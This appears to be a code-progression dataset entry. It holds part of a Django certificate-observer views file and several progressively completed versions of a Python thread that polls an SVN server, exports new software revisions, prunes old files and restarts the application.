str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]\n\n #TODO\n #Certificate.objects.raw(\"select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;\",\n #[cert.get_x509_data().get_pubkey().bits()])\n\n #return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': round(keysize_distribution[0].percentage,2)})\n return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})\n\ndef certraw(request,cert_id):\n cert = get_object_or_404(Certificate, pk=cert_id)\n \n response = HttpResponse(cert.certificate, content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=\"certificate_{}.crt'.format(cert_id)\n return response\n\ndef logdetail(request,log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n \n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, \"static/flags/png/{0}.png\".format(flag_id.lower())), \"rb\") as f:\n return HttpResponse(f.read(), content_type=\"image/png\")\n except IOError:\n with open(os.path.join(BASE_DIR, \"static/flags/png/-.png\"), \"rb\") as f:\n return HttpResponse(f.read(), content_type=\"image/png\")\n\ndef imprint(request):\n return render(request, 'observer/imprint.html')\n \ndef issues(request):\n return render(request, 'observer/issues.html')\n \ndef status(request):\n status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n \n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])\n 
status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = \"Could not load status file.\"+str(e)\n \n \n return render(request, 'observer/status.html', {'status':status})\n\n\ndef certcheck(request):\n \n if request.method == 'POST':\n \n serial_post = request.POST['serial']\n \n sqlQuery = \"\"\"SELECT id FROM certificate WHERE serial=%s\"\"\"\n sqlQuery_commonName = \"\"\"SELECT * FROM ca WHERE \"\"\"\n \n \n current_time = str(datetime.datetime.now())\n \n serial_int = int(serial_post, 16)\n serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\\0'\n sqlData = (psycopg2.Binary(serial),)\n \n found_serial = Certificate.objects.raw(sqlQuery, sqlData)\n \n if(found_serial):\n return HttpResponse(found_serial)\n else:\n return HttpResponse(\"none\")\n \n\n return render(request, 'observer/checkserial.html', {})\n",
"step-ids": [
25,
26,
28,
29,
35
]
}
|
[
25,
26,
28,
29,
35
] |
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    @property
    def localRevisionRecord(self):
        """
        Get the locally recorded software revision (.gcm).

        Reads the revision record from the file at
        ``self.localRevisionRecordPath``. If the file cannot be opened,
        the record is reset to 0 via the property setter and the value
        is re-read through this property.

        Returns:
            The revision record as read from file (a string), or the
            re-read value after the record was reset to 0 on failure.
        """
        localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
        localLog.debug('Getting local revision record...')
        # Path of the .gcm record file; set elsewhere on the instance.
        revisionRecordPath = self.localRevisionRecordPath
        localLog.debug('Attemption to get record from file...')
        try:
            with open(revisionRecordPath, 'r') as f:
                localRecord = f.read()
            localLog.debug('Local revision record: ' + str(localRecord))
        except Exception as e:
            # File missing/unreadable: initialize the record to 0 through
            # the setter, then read the freshly written value back via
            # this same property.
            self.log.warning('Failed to open file! - ' + str(e))
            self.localRevisionRecord = 0
            localRecord = self.localRevisionRecord
        return localRecord
<|reserved_special_token_0|>
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
    def run(self):
        """
        Run the Greger Update Agent main loop.

        Waits for the client module to signal readiness, snapshots the
        currently running threads by class name, then periodically
        compares the local revision record against the latest server
        revision. On a mismatch it downloads the new software, pushes
        revision info to the server, stops all execution and restarts
        the application. Loops until self.stopExecution is set.
        """
        localLog = logging.getLogger(self.logPath + '.run')
        self.log.info('Starting Greger Update Agent (GUA)...')
        localLog.debug('Wait for Greger Client Module to start...')
        self.ready.wait()
        # Map each live thread's class name to the thread object;
        # enumerate() here is presumably threading.enumerate — confirm
        # against the file's imports.
        allThreads = {}
        for thr in enumerate():
            localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
                )
            allThreads.update({thr.__class__.__name__: thr})
            if thr.__class__.__name__ == 'GregerClientModule':
                localLog.debug('Greger Client Module thread found! ' +
                    allThreads['GregerClientModule'].name)
        loopCount = 0
        while not self.stopExecution.is_set():
            loopCount += 1
            localLog.debug('Checking for updates (' + str(loopCount) + ')...')
            localLog.debug('Getting local revision record...')
            localRevision = self.localRevisionRecord
            localLog.debug('Getting latest software info...')
            softwareInfo = self.getSoftwareInfo()
            self.log.info('Revision check done! (' + str(localRevision) + ')')
            # NOTE(review): getSoftwareInfo returns None when the
            # 'guaSWSource' setting is missing; this comparison would
            # then raise TypeError — confirm intended behavior.
            if int(localRevision) == int(softwareInfo['revision']):
                self.log.info('No new revision found.')
            else:
                self.log.info('New revision found!')
                localLog.debug('Attempting to update software...')
                self.updateSoftware()
                localLog.debug(
                    'Attempting to update server with software info...')
                allThreads['GregerDatabase'].update('about', softwareInfo)
                self.log.info(
                    'Attempting to stop all exection before restarting...')
                allThreads['GregerClientModule'].stopAll(GUA=True)
                self.log.info('Attemption to restart application...')
                restart_program()
            # Delay between update checks comes from server settings,
            # falling back to 10 seconds when not configured.
            if 'guaCheckUpdateDelay' in GregerDatabase.settings:
                delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
                    'value']
            else:
                delayTime = 10
                self.log.warning('Settings not defined! (using default=10)')
            self.log.info('Waiting ' + str(delayTime) + 's...')
            # wait() doubles as an interruptible sleep: returns early if
            # stopExecution gets set.
            self.stopExecution.wait(delayTime)
        self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
    @property
    def localRevisionRecord(self):
        """
        Get the locally recorded software revision (.gcm).

        Reads the revision record from the file at
        ``self.localRevisionRecordPath``. If the file cannot be opened,
        the record is reset to 0 via the property setter and the value
        is re-read through this property.

        Returns:
            The revision record as read from file (a string), or the
            re-read value after the record was reset to 0 on failure.
        """
        localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
        localLog.debug('Getting local revision record...')
        # Path of the .gcm record file; set elsewhere on the instance.
        revisionRecordPath = self.localRevisionRecordPath
        localLog.debug('Attemption to get record from file...')
        try:
            with open(revisionRecordPath, 'r') as f:
                localRecord = f.read()
            localLog.debug('Local revision record: ' + str(localRecord))
        except Exception as e:
            # File missing/unreadable: initialize the record to 0 through
            # the setter, then read the freshly written value back via
            # this same property.
            self.log.warning('Failed to open file! - ' + str(e))
            self.localRevisionRecord = 0
            localRecord = self.localRevisionRecord
        return localRecord
    @localRevisionRecord.setter
    def localRevisionRecord(self, newRevision):
        """
        Set the local revision record (.gcm).

        Writes ``newRevision`` (stringified) to the file at
        ``self.localRevisionRecordPath``, overwriting any previous
        record.

        Args:
            newRevision: Revision value to persist; converted with str().
        """
        localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
        localLog.debug('Setting local revision record (.gcm) to ' + str(
            newRevision) + '...')
        revisionRecordPath = self.localRevisionRecordPath
        localLog.debug('Attemption to write "' + str(newRevision) +
            '" to file...')
        # 'w' truncates: the file always holds exactly the latest record.
        with open(revisionRecordPath, 'w') as f:
            f.write(str(newRevision))
        self.log.info('Local revision record set: ' + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
def __init__(self, ready=None):
"""
Initialize the main class
"""
Thread.__init__(self)
self.ready = ready
self.logPath = 'root.GUA'
self.log = logging.getLogger(self.logPath)
localLog = logging.getLogger(self.logPath + '.__init__')
localLog.debug('Initiating Greger Update Agent (GUA)...')
self.stopExecution = Event()
self._location = os.path.abspath(__file__)
self._location = self._location[:-15]
localLog.debug('Local path: ' + self._location)
localLog.debug('Getting configuration parameters from file...')
config = getLocalConfig()
self.localRevisionRecordPath = config.get('greger_update_agent',
'local_revision_path')
localLog.debug('Parameter: (localRevisionRecordPath) ' + self.
localRevisionRecordPath)
self.log.info('Greger Update Agent (GUA) successfully initiated!')
@property
def localRevisionRecord(self):
"""
Get local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Getting local revision record...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to get record from file...')
try:
with open(revisionRecordPath, 'r') as f:
localRecord = f.read()
localLog.debug('Local revision record: ' + str(localRecord))
except Exception as e:
self.log.warning('Failed to open file! - ' + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
@localRevisionRecord.setter
def localRevisionRecord(self, newRevision):
"""
Set local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Setting local revision record (.gcm) to ' + str(
newRevision) + '...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to write "' + str(newRevision) +
'" to file...')
with open(revisionRecordPath, 'w') as f:
f.write(str(newRevision))
self.log.info('Local revision record set: ' + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
    """
    Greger Update Agent (GUA).

    Background thread that polls an SVN server for new software
    revisions, downloads them into the application directory, prunes
    files that are no longer part of the release and restarts the
    application once an update has been installed.
    """

    def __init__(self, ready=None):
        """
        Initialize the main class.

        :param ready: threading.Event signalled by the Greger Client
                      Module once start-up is complete; run() waits on it.
        """
        Thread.__init__(self)
        self.ready = ready
        self.logPath = 'root.GUA'
        self.log = logging.getLogger(self.logPath)
        localLog = logging.getLogger(self.logPath + '.__init__')
        localLog.debug('Initiating Greger Update Agent (GUA)...')
        # Event used to request termination of the run() loop.
        self.stopExecution = Event()
        # Application root path: trim the trailing 'gcm/__main__.py'
        # (15 characters) from this file's absolute path.
        self._location = os.path.abspath(__file__)
        self._location = self._location[:-15]
        localLog.debug('Local path: ' + self._location)
        localLog.debug('Getting configuration parameters from file...')
        config = getLocalConfig()
        # File that records the revision currently installed locally.
        self.localRevisionRecordPath = config.get('greger_update_agent',
            'local_revision_path')
        localLog.debug('Parameter: (localRevisionRecordPath) ' + self.
            localRevisionRecordPath)
        self.log.info('Greger Update Agent (GUA) successfully initiated!')

    @property
    def localRevisionRecord(self):
        """
        Get local revision record (.gcm).

        Falls back to 0 (creating the record file) if it cannot be read.
        """
        localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
        localLog.debug('Getting local revision record...')
        revisionRecordPath = self.localRevisionRecordPath
        localLog.debug('Attemption to get record from file...')
        try:
            with open(revisionRecordPath, 'r') as f:
                localRecord = f.read()
            localLog.debug('Local revision record: ' + str(localRecord))
        except Exception as e:
            self.log.warning('Failed to open file! - ' + str(e))
            # Initialize the record to 0, then re-read it through the getter.
            self.localRevisionRecord = 0
            localRecord = self.localRevisionRecord
        return localRecord

    @localRevisionRecord.setter
    def localRevisionRecord(self, newRevision):
        """
        Set local revision record (.gcm).
        """
        localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
        localLog.debug('Setting local revision record (.gcm) to ' + str(
            newRevision) + '...')
        revisionRecordPath = self.localRevisionRecordPath
        localLog.debug('Attemption to write "' + str(newRevision) +
            '" to file...')
        with open(revisionRecordPath, 'w') as f:
            f.write(str(newRevision))
        self.log.info('Local revision record set: ' + str(newRevision))

    def getSoftwareInfo(self, rev='HEAD'):
        """
        Retrieve information about a revision available on server.

        :param rev: revision to query (default 'HEAD').
        :return: dict with revision number, SHA, author, date and comment,
                 or None if the server URI setting is missing.
        """
        localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
        localLog.debug('Attempting to retrieve software revision info...')
        if 'guaSWSource' in GregerDatabase.settings:
            guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
        else:
            # BUG FIX: str(guaSWSource) referenced an undefined name and
            # raised NameError; log the setting name literally instead.
            self.log.warning('Setting guaSWSource not defined!')
            return
        moduleReturn = {'revision': '', 'revision_SHA': '',
            'revision_author': '', 'revision_date': '', 'revision_comment': ''}
        localLog.debug('Attempting to retrieve info from server... ' +
            guaSWServerURI)
        pCmd = 'svn proplist -v -R --revprop -r ' + rev
        pCmd += ' ' + guaSWServerURI
        localLog.debug(pCmd)
        try:
            # universal_newlines=True makes communicate() return str on
            # Python 3 (the parsing below compares against str literals).
            p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True,
                universal_newlines=True)
            output, err = p.communicate()
            # First line holds the revision; remaining lines are
            # 'property : value' pairs, stripped of surrounding whitespace.
            outputList = output.splitlines()[1:]
            outputList = [elem.strip() for elem in outputList]
            revStr = output.splitlines()[0]
            revStr = revStr.split()[-1]
            moduleReturn['revision'] = revStr[:-1]
            localLog.debug('Revision: ' + revStr[:-1])
            shaStr = outputList[outputList.index('git-commit') + 1]
            moduleReturn['revision_SHA'] = shaStr
            localLog.debug('Revision SHA: ' + shaStr)
            authorStr = outputList[outputList.index('svn:author') + 1]
            moduleReturn['revision_author'] = authorStr
            localLog.debug('Revision author: ' + authorStr)
            dateStr = outputList[outputList.index('svn:date') + 1]
            moduleReturn['revision_date'] = dateStr
            localLog.debug('Revision date: ' + dateStr)
            commentStr = outputList[outputList.index('svn:log') + 1].strip()
            moduleReturn['revision_comment'] = commentStr
            localLog.debug('Revision Comment: ' + commentStr)
            if err is not None:
                localLog.debug('Error message: ' + str(err))
        except Exception as e:
            self.log.error('Oops! Something went wrong - ' + str(e))
        return moduleReturn

    def updateSoftware(self, swRev='HEAD'):
        """
        Get and updating software from server.

        Downloads revision *swRev* into <app root>/gcm via 'svn export'
        and removes local files that are not part of the new release.
        """
        localLog = logging.getLogger(self.logPath + '.updateSoftware')
        localLog.debug('Getting software revision ' + str(swRev) +
            ' from server and updating local client...')
        localLog.debug('Constructing target path for new software...')
        targetRoot = self._location
        targetDir = 'gcm'
        targetPath = os.path.join(targetRoot, targetDir)
        localLog.debug('Target path: ' + targetPath)
        localLog.debug('Retrieving relevant parameters from server...')
